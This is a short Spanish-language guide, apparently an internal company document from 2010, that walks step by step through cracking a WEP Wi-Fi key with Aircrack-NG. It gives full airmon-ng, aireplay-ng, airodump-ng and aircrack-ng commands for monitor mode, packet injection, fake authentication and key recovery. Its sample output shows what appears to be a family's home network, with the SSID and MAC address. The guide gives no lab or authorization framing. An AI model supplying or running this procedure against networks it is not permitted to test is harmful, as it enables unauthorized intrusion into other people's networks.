Crack de WEP con Aircrack-NG
Descripción
Entre las redes inalámbricas, aquellas con seguridad WEP son las más vulnerables; existen métodos estadísticos para averiguar la clave de cifrado.
Prerequistos
Aircrack-NG instalado, y una tarjeta de red inalámbrica que lo soporte:
http://www.aircrack-ng.org/install.html - Instalación
http://www.aircrack-ng.org/doku.php?id=compatibility_drivers Drivers compatibles
Procedimiento
1. Habilitar interfaz de monitoreo:
sudo airmon-ng start <interfaz_inalámbrica> <canal_de_monitoreo>
Aquí nos dice cuál es la interfaz de monitoreo, normalmente es mon0
2. Buscar Redes que se dejen inyectar
sudo aireplay-ng -9 <interfaz_de_monitoreo>
Seleccionar la red que mayor porcentaje de paquetes logre inyectar, y que mayor potencia tenga.
Se recomienda copiar los resultados en un archivo de texto, ya que serán utilizados en los demás pasos. Un ejemplo:
13:54:52 00:19:E0:A5:36:B6 - channel: 6 - 'FAMILIA LEAL'
13:54:53 Ping (min/avg/max): 1.074ms/44.784ms/75.551ms Power: -62.60
13:54:53 30/30: 100%
La primera entrada es la MAC Address del Access Point, seguido por el canal en el que se encuentra, y el ESSID de la red. La segunda entrada son los tiempos y la potencia de la red, y por último, la cantidad de paquetes que fueron inyectados.
3. Captura de paquetes (abrir en otra consola)
sudo airodump-ng –channel <canal_de_la_redl> –bssid <MAC_Address_AP> –write <archivo> <interfaz_de_monitoreo>
4. Probar inyectar paquetes en la red elegida:
sudo aireplay-ng -9 -e <essid_red> -a <MAC_Address_AP> <interfaz_de_monitoreo>
5. Verificar si hay filtrado MAC, y autenticación falsa:
sudo aireplay-ng -1 0 -e <essid_red> -a <MAC_Address_AP> -h <MAC_Address_Interfaz_Inalámbrica> <interfaz_de_monitoreo>
si no funciona:
sudo aireplay-ng -1 6000 -o 1 -q 10 -e <essid_red> -a <MAC_Address_AP> -h <MAC_Address_Interfaz_Inalámbrica> <interfaz_de_monitoreo>
6. Probar inyectar paquetes en la red elegida:
sudo aireplay-ng -3 -b <MAC_Address_AP> -h <MAC_Address_Interfaz_Inalámbrica> <interfaz_de_monitoreo>
7. Romper la llave:
sudo aircrack-ng -z -b <MAC_Address_AP> test*.cap
Problemas
-
Referencias
http://www.aircrack-ng.org/doku.php?id=simple_wep_crack
http://www.aircrack-ng.org/doku.php?id=flowchart
-
FIN
21-Enero-2010 D.F. Madiedo v1.0 Primera version
Advertencia
Este documento es privado y es de u so exclusivo de sus autores y de SKINA TECH. Cualquier uso sin una autorización escrita es contra la ley de derechos de autor y de propiedad intelectual, y será motivo de una acción legal.